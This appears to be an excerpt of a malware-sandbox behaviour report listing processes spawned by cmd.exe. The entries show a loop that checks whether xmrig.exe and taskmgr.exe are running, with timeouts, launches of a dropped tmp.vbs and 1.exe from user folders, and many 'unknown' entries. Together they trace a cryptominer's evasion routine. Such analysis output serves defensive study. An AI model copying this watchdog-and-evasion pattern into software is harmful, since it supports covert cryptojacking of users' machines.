Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\AppData\Roaming\1.exe "C:\Users\user\AppData\Roaming\1.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "imagename eq taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\find.exe find /i "taskmgr.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\tasklist.exe tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
